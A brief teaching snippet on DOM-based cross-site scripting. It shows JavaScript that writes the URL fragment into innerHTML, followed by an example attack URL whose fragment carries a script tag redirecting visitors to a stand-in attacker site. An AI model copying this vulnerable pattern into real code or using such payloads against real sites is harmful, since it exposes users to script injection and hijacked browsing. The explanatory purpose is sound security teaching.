DOM-based XSS

This means an attacker can construct a URL with malicious JavaScript in the URI fragment...

Dangerous use of innerHTML

   window.addEventListener('load', function() {
  const page = window.location.hash.substr(1);
  loadPage(page);

  document.getElementById('page-no').innerHTML = page;
}); 

www.chinterest.com#<script>window.location="www.haxxed.com"</script#>